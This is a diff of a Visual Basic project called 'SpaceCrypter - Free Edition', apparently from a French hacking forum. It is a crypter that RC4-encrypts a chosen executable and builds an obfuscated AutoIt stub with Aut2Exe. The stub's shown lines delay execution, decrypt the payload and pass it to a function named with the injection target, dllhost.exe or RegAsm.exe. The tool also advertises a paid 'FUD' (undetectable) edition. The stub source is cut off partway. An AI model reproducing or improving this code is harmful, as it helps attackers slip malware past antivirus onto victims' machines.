/wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af//
|
||||
/wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af//
|
||||
/wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af//
|
||||
/wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af//
|
||||
/wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af//
|
||||
/wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af//
|
||||
/wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af//
|
||||
/wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af//
|
||||
/wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af//
|
||||
/wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af//
|
||||
/wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af//
|
||||
/wH///8B////Af///wH///8B////Af///wEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
|
||||
</value>
|
||||
</data>
|
||||
</root>
|
||||
@@ -0,0 +1,230 @@
|
||||
Imports System.IO
|
||||
Imports System.Text
|
||||
|
||||
Public Class Form1
|
||||
|
||||
#Region "La merde"
|
||||
Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
|
||||
Try
|
||||
Directory.Delete(TempName(), FileIO.DeleteDirectoryOption.DeleteAllContents)
|
||||
If Not Directory.Exists(TempName) Then
|
||||
Directory.CreateDirectory(TempName)
|
||||
End If
|
||||
Catch : End Try
|
||||
End Sub
|
||||
|
||||
Private Sub CheckBoxIcon_CheckedChanged(sender As Object, e As EventArgs) Handles CheckBoxIcon.CheckedChanged
|
||||
If CheckBoxIcon.Checked = True Then
|
||||
ButtonChangerIco.Enabled = True
|
||||
Else
|
||||
ButtonChangerIco.Enabled = False
|
||||
End If
|
||||
End Sub
|
||||
|
||||
Private Sub ChargerFichier_Click(sender As Object, e As EventArgs) Handles ChargerFichier.Click
|
||||
Dim fichier As New OpenFileDialog
|
||||
fichier.Filter = "Exécutable | *.exe"
|
||||
fichier.Title = "Choissier un fichier a crypter"
|
||||
If fichier.ShowDialog = vbOK Then
|
||||
TextBoxFichier.Text = fichier.FileName
|
||||
End If
|
||||
If Not managed(File.ReadAllBytes(TextBoxFichier.Text)) Then
|
||||
Label8.Text = "Application native"
|
||||
RadioButtonNatif.Checked = True
|
||||
RadioButtonDll.Checked = True
|
||||
Else
|
||||
If managed(File.ReadAllBytes(TextBoxFichier.Text)) Then
|
||||
Label8.Text = "Application .NET"
|
||||
RadioButtonNet.Checked = True
|
||||
RadioButtonReg.Checked = True
|
||||
End If
|
||||
End If
|
||||
End Sub
|
||||
|
||||
Private Sub RandomPool1_CharacterSelection(s As Object, c As Char) Handles RandomPool1.CharacterSelection
|
||||
If TextBoxEncryption.Text.Length < 50 Then
|
||||
Try
|
||||
TextBoxEncryption.Text = TextBoxEncryption.Text & c
|
||||
Catch : End Try
|
||||
End If
|
||||
End Sub
|
||||
|
||||
Public Function managed(executable As Byte()) As Boolean
|
||||
Return executable(60) = 128
|
||||
End Function
|
||||
|
||||
Private Sub ButtonChangerIco_Click(sender As Object, e As EventArgs) Handles ButtonChangerIco.Click
|
||||
Dim chargericon As New OpenFileDialog
|
||||
chargericon.Title = "Charger l'icon que vous souhaiter"
|
||||
chargericon.Filter = "Icon | *.ico"
|
||||
If chargericon.ShowDialog = vbOK Then
|
||||
PictureIcon.ImageLocation = chargericon.FileName
|
||||
End If
|
||||
End Sub
|
||||
|
||||
Private Sub RadioButtonNet_CheckedChanged(sender As Object, e As EventArgs) Handles RadioButtonNet.CheckedChanged
|
||||
If RadioButtonNet.Checked = True Then
|
||||
RadioButtonDll.Enabled = False
|
||||
RadioButtonReg.Enabled = True
|
||||
RadioButtonReg.Checked = True
|
||||
RadioButtonDll.Checked = False
|
||||
Else
|
||||
RadioButtonReg.Enabled = False
|
||||
RadioButtonReg.Checked = False
|
||||
RadioButtonDll.Enabled = True
|
||||
RadioButtonDll.Checked = True
|
||||
End If
|
||||
End Sub
|
||||
#End Region
|
||||
|
||||
Public Function TempName()
|
||||
Dim DossierTemp As String = Path.GetTempPath & "SpaceCrypterFree\"
|
||||
Return DossierTemp
|
||||
End Function
|
||||
|
||||
Private Shared Function rc4(ByVal Input As Byte(), ByVal Key As Byte()) As Byte()
|
||||
Dim i, j, swap As UInteger
|
||||
Dim s As UInteger() = New UInteger(255) {}
|
||||
Dim Output As Byte() = New Byte(Input.Length - 1) {}
|
||||
|
||||
For i = 0 To 255
|
||||
s(i) = i
|
||||
Next
|
||||
|
||||
For i = 0 To 255
|
||||
j = (j + Key(i Mod Key.Length) + s(i)) And 255
|
||||
swap = s(i)
|
||||
s(i) = s(j)
|
||||
s(j) = swap
|
||||
Next
|
||||
i = 0 : j = 0
|
||||
For c = 0 To Output.Length - 1
|
||||
i = (i + 1) And 255
|
||||
j = (j + s(i)) And 255
|
||||
swap = s(i)
|
||||
s(i) = s(j)
|
||||
s(j) = swap
|
||||
Output(c) = Input(c) Xor s((s(i) + s(j)) And 255)
|
||||
Next
|
||||
|
||||
Return Output
|
||||
End Function
|
||||
|
||||
Public Function ExtStr(cadena As String, Opt As Long, Optional dirChar As String = "\") As String
|
||||
Try
|
||||
Dim FullName As String
|
||||
FullName = Mid$(cadena, InStrRev(cadena, dirChar) + 1)
|
||||
Select Case Opt
|
||||
Case 1
|
||||
'Nombre
|
||||
ExtStr = Mid$(FullName, 1, InStrRev(FullName, ".") - 1)
|
||||
Case 2
|
||||
'Extension
|
||||
ExtStr = "." & Mid$(FullName, InStrRev(FullName, ".") + 1)
|
||||
Case 3
|
||||
'Nombre + Extension
|
||||
ExtStr = FullName
|
||||
Case Else
|
||||
ExtStr = cadena
|
||||
End Select
|
||||
Catch : End Try
|
||||
End Function
|
||||
|
||||
Function CorrectionDuFichier()
|
||||
Dim correct As String
|
||||
If TextBoxFichiercop.Text.Contains(".exe") Then
|
||||
correct = TextBoxFichiercop.Text
|
||||
Else
|
||||
correct = TextBoxFichiercop.Text & ".exe"
|
||||
End If
|
||||
Return correct
|
||||
End Function
|
||||
|
||||
Private Sub Button2_Click(sender As Object, e As EventArgs) Handles Button2.Click
|
||||
If TextBoxClestartup.TextLength < 1 Then
|
||||
ElseIf TextBoxDossier.TextLength < 1 Then
|
||||
ElseIf TextBoxEncryption.TextLength < 1 Then
|
||||
ElseIf TextBoxFichier.TextLength < 1 Then
|
||||
ElseIf TextBoxFichiercop.TextLength < 1 Then
|
||||
MsgBox("Vous n'avez pas remplis tout les champs nécéssaire pour le cryptage", MsgBoxStyle.OkOnly, "Erreur lors du cryptage")
|
||||
Exit Sub
|
||||
Else
|
||||
Dim dossierTemp As String = TempName()
|
||||
Try
|
||||
Directory.CreateDirectory(dossierTemp)
|
||||
Catch : End Try
|
||||
Dim crypter As New SaveFileDialog
|
||||
crypter.Filter = "Executable | .exe"
|
||||
crypter.FileName = ExtStr(TextBoxFichier.Text, 1) & ".crypted"
|
||||
If crypter.ShowDialog = vbOK Then
|
||||
Try
|
||||
Dim Encryption As String = Chr(34) & TextBoxEncryption.Text & Chr(34)
|
||||
Dim injection As String
|
||||
Dim Startup As String = Chr(34) & TextBoxClestartup.Text & Chr(34)
|
||||
Dim Fichier As String = Chr(34) & CorrectionDuFichier() & Chr(34)
|
||||
Dim Dossier As String = Chr(34) & TextBoxDossier.Text & Chr(34)
|
||||
Dim FichieraCrypt() As Byte = rc4(File.ReadAllBytes(TextBoxFichier.Text), Encoding.[Default].GetBytes(TextBoxEncryption.Text))
|
||||
ProgressBar1.Value = 30
|
||||
If RadioButtonDll.Checked = True Then
|
||||
injection = Chr(34) & "C:\Windows\System32\dllhost.exe" & Chr(34)
|
||||
Else
|
||||
injection = Chr(34) & "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & Chr(34)
|
||||
End If
|
||||
File.WriteAllBytes(dossierTemp & "Aut2Exe.exe", My.Resources.Aut2Exe)
|
||||
|
||||
File.WriteAllText(dossierTemp & "stub.au3", My.Resources.Stub.Replace("%DOSSIER%", Dossier).Replace("%NOM%", Fichier).Replace("%STARTUP%", Startup).Replace("%KEY%", Encryption).Replace("%INJECTION%", injection))
|
||||
File.WriteAllText(dossierTemp & "rc4.oc", My.Resources.rc4)
|
||||
ProgressBar1.Value = 55
|
||||
File.WriteAllBytes(dossierTemp & "encrypted.bin", FichieraCrypt)
|
||||
ProgressBar1.Value = 60
|
||||
Dim BuildDuStub As ProcessStartInfo = New ProcessStartInfo()
|
||||
If CheckBoxIcon.Checked = True Then
|
||||
BuildDuStub.Arguments = "/in " & dossierTemp & "stub.au3 /out " & dossierTemp & "Compiled.exe /icon " & PictureIcon.ImageLocation & " /comp 4 /nopack"
|
||||
Else
|
||||
BuildDuStub.Arguments = "/in " & dossierTemp & "stub.au3 /out " & dossierTemp & "Compiled.exe /comp 4 /nopack"
|
||||
End If
|
||||
BuildDuStub.WindowStyle = ProcessWindowStyle.Hidden
|
||||
BuildDuStub.CreateNoWindow = True
|
||||
BuildDuStub.FileName = dossierTemp & "Aut2Exe.exe"
|
||||
ProgressBar1.Value = 80
|
||||
Process.Start(BuildDuStub)
|
||||
ProgressBar1.Value = 90
|
||||
Threading.Thread.Sleep(1000)
|
||||
If File.Exists(crypter.FileName) Then
|
||||
File.Delete(crypter.FileName)
|
||||
File.Copy(dossierTemp & "Compiled.exe", crypter.FileName)
|
||||
Else
|
||||
File.Copy(dossierTemp & "Compiled.exe", crypter.FileName)
|
||||
End If
|
||||
ProgressBar1.Value = 100
|
||||
Directory.Delete(dossierTemp, FileIO.DeleteDirectoryOption.DeleteAllContents)
|
||||
Media.SystemSounds.Asterisk.Play()
|
||||
Dim reponse = MsgBox("Votre fichier a correctement etait crypter" + vbNewLine + "Si vous souhaiter avoir plus d'option ou être FUD" + vbNewLine + "Passer à la version payante", MsgBoxStyle.YesNo, "Fichier crypter correctement")
|
||||
If reponse = MsgBoxResult.Yes Then
|
||||
Process.Start("http://hack-free.net/private.php?action=send&uid=910&subject=Space-Crypter")
|
||||
End If
|
||||
ProgressBar1.Value = 0
|
||||
Catch ex As Exception
|
||||
Dim Erreur As String = Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory) & "\Erreur detaillé.txt"
|
||||
File.Create(Erreur).Close()
|
||||
Dim EcrireErreur As New StreamWriter(Erreur)
|
||||
EcrireErreur.Write(ex.ToString)
|
||||
EcrireErreur.Close()
|
||||
MsgBox("Un Fichier a etait crée sur votre Bureau comprenant l'erreur qui a eu lieux")
|
||||
MsgBox("Une erreur est suvenur au moment du cryptage." + vbNewLine + "Si ce problème persiste contacter FyR0z avec le Fichier sur Hack-Free", MsgBoxStyle.OkOnly, "Erreur lors du cryptage")
|
||||
End Try
|
||||
End If
|
||||
End If
|
||||
|
||||
End Sub
|
||||
|
||||
Private Sub Acheter_Click(sender As Object, e As EventArgs) Handles Acheter.Click
|
||||
Dim response2 = MsgBox("Si vous souhaiter avoir plus d'option ou être FUD" + vbNewLine + "Passer à la version payante", MsgBoxStyle.YesNo, "Interesser par la version payante ?")
|
||||
Media.SystemSounds.Asterisk.Play()
|
||||
If response2 = MsgBoxResult.Yes Then
|
||||
Process.Start("http://hack-free.net/private.php?action=send&uid=910&subject=Space-Crypter")
|
||||
End If
|
||||
End Sub
|
||||
|
||||
|
||||
End Class
|
||||
Generated
+38
@@ -0,0 +1,38 @@
|
||||
'------------------------------------------------------------------------------
|
||||
' <auto-generated>
|
||||
' Ce code a été généré par un outil.
|
||||
' Version du runtime :4.0.30319.42000
|
||||
'
|
||||
' Les modifications apportées à ce fichier peuvent provoquer un comportement incorrect et seront perdues si
|
||||
' le code est régénéré.
|
||||
' </auto-generated>
|
||||
'------------------------------------------------------------------------------
|
||||
|
||||
Option Strict On
|
||||
Option Explicit On
|
||||
|
||||
|
||||
Namespace My
|
||||
|
||||
'REMARQUE : ce fichier étant généré automatiquement, ne le modifiez pas directement. Pour apporter des modifications,
|
||||
' ou si vous rencontrez des erreurs de build dans ce fichier, accédez au Concepteur de projets
|
||||
' (allez dans les propriétés du projet ou double-cliquez sur le nœud My Project dans
|
||||
' l'Explorateur de solutions), puis apportez vos modifications sous l'onglet Application.
|
||||
'
|
||||
Partial Friend Class MyApplication
|
||||
|
||||
<Global.System.Diagnostics.DebuggerStepThroughAttribute()> _
|
||||
Public Sub New()
|
||||
MyBase.New(Global.Microsoft.VisualBasic.ApplicationServices.AuthenticationMode.Windows)
|
||||
Me.IsSingleInstance = false
|
||||
Me.EnableVisualStyles = true
|
||||
Me.SaveMySettingsOnExit = false
|
||||
Me.ShutDownStyle = Global.Microsoft.VisualBasic.ApplicationServices.ShutdownMode.AfterMainFormCloses
|
||||
End Sub
|
||||
|
||||
<Global.System.Diagnostics.DebuggerStepThroughAttribute()> _
|
||||
Protected Overrides Sub OnCreateMainForm()
|
||||
Me.MainForm = Global.SpaceCrypter___Free_Edition.Form1
|
||||
End Sub
|
||||
End Class
|
||||
End Namespace
|
||||
+10
@@ -0,0 +1,10 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<MyApplicationData xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
|
||||
<MySubMain>true</MySubMain>
|
||||
<MainForm>Form1</MainForm>
|
||||
<SingleInstance>false</SingleInstance>
|
||||
<ShutdownMode>0</ShutdownMode>
|
||||
<EnableVisualStyles>true</EnableVisualStyles>
|
||||
<AuthenticationMode>0</AuthenticationMode>
|
||||
<SaveMySettingsOnExit>false</SaveMySettingsOnExit>
|
||||
</MyApplicationData>
|
||||
+35
@@ -0,0 +1,35 @@
|
||||
Imports System
|
||||
Imports System.Reflection
|
||||
Imports System.Runtime.InteropServices
|
||||
|
||||
' Les informations générales relatives à un assembly dépendent de
|
||||
' l'ensemble d'attributs suivant. Changez les valeurs de ces attributs pour modifier les informations
|
||||
' associées à un assembly.
|
||||
|
||||
' Vérifiez les valeurs des attributs de l'assembly
|
||||
|
||||
<Assembly: AssemblyTitle("SpaceCrypter - Free Edition")>
|
||||
<Assembly: AssemblyDescription("Crypter fait par FyR0z pour Hack-Free, Edition gratuite de Space Crypter")>
|
||||
<Assembly: AssemblyCompany("SpaceCrypter")>
|
||||
<Assembly: AssemblyProduct("SpaceCrypter - Free Edition")>
|
||||
<Assembly: AssemblyCopyright("Copyright © 2016")>
|
||||
<Assembly: AssemblyTrademark("")>
|
||||
|
||||
<Assembly: ComVisible(False)>
|
||||
|
||||
'Le GUID suivant est pour l'ID de la typelib si ce projet est exposé à COM
|
||||
<Assembly: Guid("44dbd15a-07ba-4221-bfd9-0e7bcfe17426")>
|
||||
|
||||
' Les informations de version pour un assembly se composent des quatre valeurs suivantes :
|
||||
'
|
||||
' Version principale
|
||||
' Version secondaire
|
||||
' Numéro de build
|
||||
' Révision
|
||||
'
|
||||
' Vous pouvez spécifier toutes les valeurs ou indiquer les numéros de build et de révision par défaut
|
||||
' en utilisant '*', comme indiqué ci-dessous :
|
||||
' <Assembly: AssemblyVersion("1.0.*")>
|
||||
|
||||
<Assembly: AssemblyVersion("1.0.0.0")>
|
||||
<Assembly: AssemblyFileVersion("1.0.0.0")>
|
||||
Generated
+109
@@ -0,0 +1,109 @@
|
||||
'------------------------------------------------------------------------------
|
||||
' <auto-generated>
|
||||
' Ce code a été généré par un outil.
|
||||
' Version du runtime :4.0.30319.42000
|
||||
'
|
||||
' Les modifications apportées à ce fichier peuvent provoquer un comportement incorrect et seront perdues si
|
||||
' le code est régénéré.
|
||||
' </auto-generated>
|
||||
'------------------------------------------------------------------------------
|
||||
|
||||
Option Strict On
|
||||
Option Explicit On
|
||||
|
||||
Imports System
|
||||
|
||||
Namespace My.Resources
|
||||
|
||||
'Cette classe a été générée automatiquement par la classe StronglyTypedResourceBuilder
|
||||
'à l'aide d'un outil, tel que ResGen ou Visual Studio.
|
||||
'Pour ajouter ou supprimer un membre, modifiez votre fichier .ResX, puis réexécutez ResGen
|
||||
'avec l'option /str ou régénérez votre projet VS.
|
||||
'''<summary>
|
||||
''' Une classe de ressource fortement typée destinée, entre autres, à la consultation des chaînes localisées.
|
||||
'''</summary>
|
||||
<Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0"), _
|
||||
Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), _
|
||||
Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(), _
|
||||
Global.Microsoft.VisualBasic.HideModuleNameAttribute()> _
|
||||
Friend Module Resources
|
||||
|
||||
Private resourceMan As Global.System.Resources.ResourceManager
|
||||
|
||||
Private resourceCulture As Global.System.Globalization.CultureInfo
|
||||
|
||||
'''<summary>
|
||||
''' Retourne l'instance ResourceManager mise en cache utilisée par cette classe.
|
||||
'''</summary>
|
||||
<Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
|
||||
Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
|
||||
Get
|
||||
If Object.ReferenceEquals(resourceMan, Nothing) Then
|
||||
Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("SpaceCrypter___Free_Edition.Resources", GetType(Resources).Assembly)
|
||||
resourceMan = temp
|
||||
End If
|
||||
Return resourceMan
|
||||
End Get
|
||||
End Property
|
||||
|
||||
'''<summary>
|
||||
''' Remplace la propriété CurrentUICulture du thread actuel pour toutes
|
||||
''' les recherches de ressources à l'aide de cette classe de ressource fortement typée.
|
||||
'''</summary>
|
||||
<Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
|
||||
Friend Property Culture() As Global.System.Globalization.CultureInfo
|
||||
Get
|
||||
Return resourceCulture
|
||||
End Get
|
||||
Set
|
||||
resourceCulture = value
|
||||
End Set
|
||||
End Property
|
||||
|
||||
'''<summary>
|
||||
''' Recherche une ressource localisée de type System.Byte[].
|
||||
'''</summary>
|
||||
Friend ReadOnly Property Aut2Exe() As Byte()
|
||||
Get
|
||||
Dim obj As Object = ResourceManager.GetObject("Aut2Exe", resourceCulture)
|
||||
Return CType(obj,Byte())
|
||||
End Get
|
||||
End Property
|
||||
|
||||
'''<summary>
|
||||
''' Recherche une chaîne localisée semblable à 00012C9CB5E5F589BE2460036D108057B8FFFFEF0FD048A8000000FF1E181C10706BF0E06BF060887068FFFFEF8EDB30FD9860A8FFFFEFCE5B30ED98FFFFEF8E5898000000FF52FFFFEF8E5830006BF0FFFFEFCE58308D98FFFFEFCE5898000000FF5204FFFFEFCE58B83667C05593AF98FF13FFFFEF0FD9D80BBECF54FFFFFFEF0F534888FFFFEF0FD348684FD7B8FFFFEF0F5348A8CF57B84F5498000000FF524F54308C10FFFFEF0FD0C86BF0CFD4B8006BF0015430290F577F2D13CF54B874D700001000CFD71800CF5638004F56383F2EFFFFEFFED0488810C28C88000010009B000000CD48F00C580F54988C928484EA2F7D98948C989C130155B87565 [le reste de la chaîne a été tronqué]";.
|
||||
'''</summary>
|
||||
Friend ReadOnly Property rc4() As String
|
||||
Get
|
||||
Return ResourceManager.GetString("rc4", resourceCulture)
|
||||
End Get
|
||||
End Property
|
||||
|
||||
'''<summary>
|
||||
''' Recherche une chaîne localisée semblable à FileInstall("rc4.oc", @TempDir & "\\r.oc", 1)
|
||||
'''FileInstall("encrypted.bin", @TempDir & "\\s.c", 1)
|
||||
'''
|
||||
'''Sleep(25670)
|
||||
'''$Z30EI = %DOSSIER%
|
||||
'''$Y31eptPD = %NOM%
|
||||
'''$Y32VFkD8 = %STARTUP%
|
||||
'''$D33hNXXj = %KEY%
|
||||
'''
|
||||
'''$P34heOM = %INJECTION%
|
||||
'''
|
||||
'''$D35DwRjW = STRINGREVERSE(FileRead(@TempDir & "\" &"\" &"r" &"." &"o" &"c"))
|
||||
'''$K36RSp = FileRead(@TempDir & "\" &"\" &"s" &"." &"c")
|
||||
'''$N37Y6 = C30ZP($K36RSp, $D33hNXXj)
|
||||
'''
|
||||
'''J3228($P34heOM, $N37Y6)
|
||||
'''
|
||||
'''Func C30ZP($M3132URSXaN, $H3133Ihg)
|
||||
''' Local $Q31348sDBrg = $D35DwRjW, $E3136UElHWx = Dll [le reste de la chaîne a été tronqué]";.
|
||||
'''</summary>
|
||||
Friend ReadOnly Property Stub() As String
|
||||
Get
|
||||
Return ResourceManager.GetString("Stub", resourceCulture)
|
||||
End Get
|
||||
End Property
|
||||
End Module
|
||||
End Namespace
|
||||
+261
@@ -0,0 +1,261 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<root>
|
||||
<!--
|
||||
Microsoft ResX Schema
|
||||
|
||||
Version 2.0
|
||||
|
||||
The primary goals of this format is to allow a simple XML format
|
||||
that is mostly human readable. The generation and parsing of the
|
||||
various data types are done through the TypeConverter classes
|
||||
associated with the data types.
|
||||
|
||||
Example:
|
||||
|
||||
... ado.net/XML headers & schema ...
|
||||
<resheader name="resmimetype">text/microsoft-resx</resheader>
|
||||
<resheader name="version">2.0</resheader>
|
||||
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
|
||||
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
|
||||
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
|
||||
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
|
||||
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
|
||||
<value>[base64 mime encoded serialized .NET Framework object]</value>
|
||||
</data>
|
||||
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
|
||||
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
|
||||
<comment>This is a comment</comment>
|
||||
</data>
|
||||
|
||||
There are any number of "resheader" rows that contain simple
|
||||
name/value pairs.
|
||||
|
||||
Each data row contains a name, and value. The row also contains a
|
||||
type or mimetype. Type corresponds to a .NET class that support
|
||||
text/value conversion through the TypeConverter architecture.
|
||||
Classes that don't support this are serialized and stored with the
|
||||
mimetype set.
|
||||
|
||||
The mimetype is used for serialized objects, and tells the
|
||||
ResXResourceReader how to depersist the object. This is currently not
|
||||
extensible. For a given mimetype the value must be set accordingly:
|
||||
|
||||
Note - application/x-microsoft.net.object.binary.base64 is the format
|
||||
that the ResXResourceWriter will generate, however the reader can
|
||||
read any of the formats listed below.
|
||||
|
||||
mimetype: application/x-microsoft.net.object.binary.base64
|
||||
value : The object must be serialized with
|
||||
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
|
||||
: and then encoded with base64 encoding.
|
||||
|
||||
mimetype: application/x-microsoft.net.object.soap.base64
|
||||
value : The object must be serialized with
|
||||
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
|
||||
: and then encoded with base64 encoding.
|
||||
|
||||
mimetype: application/x-microsoft.net.object.bytearray.base64
|
||||
value : The object must be serialized into a byte array
|
||||
: using a System.ComponentModel.TypeConverter
|
||||
: and then encoded with base64 encoding.
|
||||
-->
|
||||
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
|
||||
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
|
||||
<xsd:element name="root" msdata:IsDataSet="true">
|
||||
<xsd:complexType>
|
||||
<xsd:choice maxOccurs="unbounded">
|
||||
<xsd:element name="metadata">
|
||||
<xsd:complexType>
|
||||
<xsd:sequence>
|
||||
<xsd:element name="value" type="xsd:string" minOccurs="0" />
|
||||
</xsd:sequence>
|
||||
<xsd:attribute name="name" use="required" type="xsd:string" />
|
||||
<xsd:attribute name="type" type="xsd:string" />
|
||||
<xsd:attribute name="mimetype" type="xsd:string" />
|
||||
<xsd:attribute ref="xml:space" />
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
<xsd:element name="assembly">
|
||||
<xsd:complexType>
|
||||
<xsd:attribute name="alias" type="xsd:string" />
|
||||
<xsd:attribute name="name" type="xsd:string" />
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
<xsd:element name="data">
|
||||
<xsd:complexType>
|
||||
<xsd:sequence>
|
||||
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
|
||||
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
|
||||
</xsd:sequence>
|
||||
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
|
||||
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
|
||||
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
|
||||
<xsd:attribute ref="xml:space" />
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
<xsd:element name="resheader">
|
||||
<xsd:complexType>
|
||||
<xsd:sequence>
|
||||
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
|
||||
</xsd:sequence>
|
||||
<xsd:attribute name="name" type="xsd:string" use="required" />
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
</xsd:choice>
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
</xsd:schema>
|
||||
<resheader name="resmimetype">
|
||||
<value>text/microsoft-resx</value>
|
||||
</resheader>
|
||||
<resheader name="version">
|
||||
<value>2.0</value>
|
||||
</resheader>
|
||||
<resheader name="reader">
|
||||
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
|
||||
</resheader>
|
||||
<resheader name="writer">
|
||||
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
|
||||
</resheader>
|
||||
<assembly alias="System.Windows.Forms" name="System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
|
||||
<data name="Aut2Exe" type="System.Resources.ResXFileRef, System.Windows.Forms">
|
||||
<value>..\Resources\Aut2Exe.exe;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
|
||||
</data>
|
||||
<data name="rc4" xml:space="preserve">
|
||||
<value>00012C9CB5E5F589BE2460036D108057B8FFFFEF0FD048A8000000FF1E181C10706BF0E06BF060887068FFFFEF8EDB30FD9860A8FFFFEFCE5B30ED98FFFFEF8E5898000000FF52FFFFEF8E5830006BF0FFFFEFCE58308D98FFFFEFCE5898000000FF5204FFFFEFCE58B83667C05593AF98FF13FFFFEF0FD9D80BBECF54FFFFFFEF0F534888FFFFEF0FD348684FD7B8FFFFEF0F5348A8CF57B84F5498000000FF524F54308C10FFFFEF0FD0C86BF0CFD4B8006BF0015430290F577F2D13CF54B874D700001000CFD71800CF5638004F56383F2EFFFFEFFED0488810C28C88000010009B000000CD48F00C580F54988C928484EA2F7D98948C989C130155B875653500A600A60010018Cx0</value>
|
||||
</data>
|
||||
<data name="Stub" xml:space="preserve">
|
||||
<value>FileInstall("rc4.oc", @TempDir & "\\r.oc", 1)
|
||||
FileInstall("encrypted.bin", @TempDir & "\\s.c", 1)
|
||||
|
||||
Sleep(25670)
|
||||
$Z30EI = %DOSSIER%
|
||||
$Y31eptPD = %NOM%
|
||||
$Y32VFkD8 = %STARTUP%
|
||||
$D33hNXXj = %KEY%
|
||||
|
||||
$P34heOM = %INJECTION%
|
||||
|
||||
$D35DwRjW = STRINGREVERSE(FileRead(@TempDir & "\" &"\" &"r" &"." &"o" &"c"))
|
||||
$K36RSp = FileRead(@TempDir & "\" &"\" &"s" &"." &"c")
|
||||
$N37Y6 = C30ZP($K36RSp, $D33hNXXj)
|
||||
|
||||
J3228($P34heOM, $N37Y6)
|
||||
|
||||
Func C30ZP($M3132URSXaN, $H3133Ihg)
|
||||
